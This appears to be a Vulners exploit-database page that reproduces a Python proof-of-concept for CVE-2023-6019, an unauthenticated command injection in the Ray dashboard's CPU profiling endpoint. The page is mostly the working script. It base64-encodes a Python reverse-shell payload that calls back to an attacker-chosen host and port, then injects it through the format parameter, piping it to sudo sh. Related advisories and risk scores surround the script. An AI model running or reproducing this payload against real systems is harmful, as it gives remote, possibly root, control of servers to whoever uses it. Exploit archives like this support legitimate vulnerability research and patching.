Vulners
Lucene search
Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
| Reporter | Title | Published | Views | Family All 35 |
|---|---|---|---|---|
 | Ray OS v2.6.3 - Command Injection Exploit | 12 Apr 202400:00 | – | zdt |
| Ray cpu_profile Command Injection Exploit | 27 Aug 202400:00 | – | zdt |
 | Exploit for OS Command Injection in Ray_Project Ray | 21 Apr 202414:30 | – | githubexploit |
| Exploit for OS Command Injection in Ray_Project Ray | 28 Oct 202520:04 | – | githubexploit |
| Exploit for OS Command Injection in Ray_Project Ray | 10 Apr 202409:24 | – | githubexploit |
 | CVE-2023-6019 | 18 Mar 202410:01 | – | circl |
 | Ray Operating System Command Injection Vulnerability | 16 Nov 202300:00 | – | cnnvd |
 | CVE-2023-6019 | 16 Nov 202316:12 | – | cve |
 | CVE-2023-6019 Ray Command Injection in cpu_profile Parameter | 16 Nov 202316:12 | – | cvelist |
 | Ray Path Traversal vulnerability | 16 Nov 202318:30 | – | github |
10
# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
# Description:
# The Ray Project dashboard contains a CPU profiling page, and the format parameter is
# not validated before being inserted into a system command executed in a shell, allowing
# for arbitrary command execution. If the system is configured to allow passwordless sudo
# (a setup some Ray configurations require) this will result in a root shell being returned
# to the user. If not configured, a user level shell will be returned
# Version: <= 2.6.3
# Date: 2024-4-10
# Exploit Author: Fire_Wolf
# Tested on: Ubuntu 20.04.6 LTS
# Vendor Homepage: https://www.ray.io/
# Software Link: https://github.com/ray-project/ray
# CVE: CVE-2023-6019
# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe
# ==========================================================================================
# !usr/bin/python3
# coding=utf-8
import base64
import argparse
import requests
import urllib3
proxies = {"http": "127.0.0.1:8080"}
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
}
def check_url(target, port):
target_url = target + ":" + port
https = 0
if 'http' not in target:
try:
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
test_url = 'http://' + target_url
response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)
if response.status_code != 200:
is_https = 0
return is_https
except Exception as e:
print("ERROR! The Exception is:" + format(e))
if https == 1:
return "https://" + target_url
else:
return "http://" + target_url
def exp(target,ip,lhost, lport):
payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
print("[*]Payload is: " + payload)
b64_payload = base64.b64encode(payload.encode())
print("[*]Base64 encoding payload is: " + b64_payload.decode())
exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`'
# response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)
print(exp_url)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.get(url=exp_url, headers=headers, verify=False)
if response.status_code == 200:
print("[-]ERROR: Exploit Failed,please check the payload.")
else:
print("[+]Exploit is finished,please check your machine!")
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='''
⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄
⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃
⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄
⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄
⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
''',
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('-t', '--target', type=str, required=True, help='tart ip')
parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port')
parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')
parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')
args = parser.parse_args()
# target = args.target
ip = args.target
# port = args.port
# lhost = args.lhost
# lport = args.lport
targeturl = check_url(args.target, args.port)
print(targeturl)
print("[*] Checking in url: " + targeturl)
exp(targeturl, ip, args.lhost, args.lport)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Apr 2024 00:00Current
8.7High risk
Vulners AI Score8.7
CVSS 3.19.8
EPSS0.88771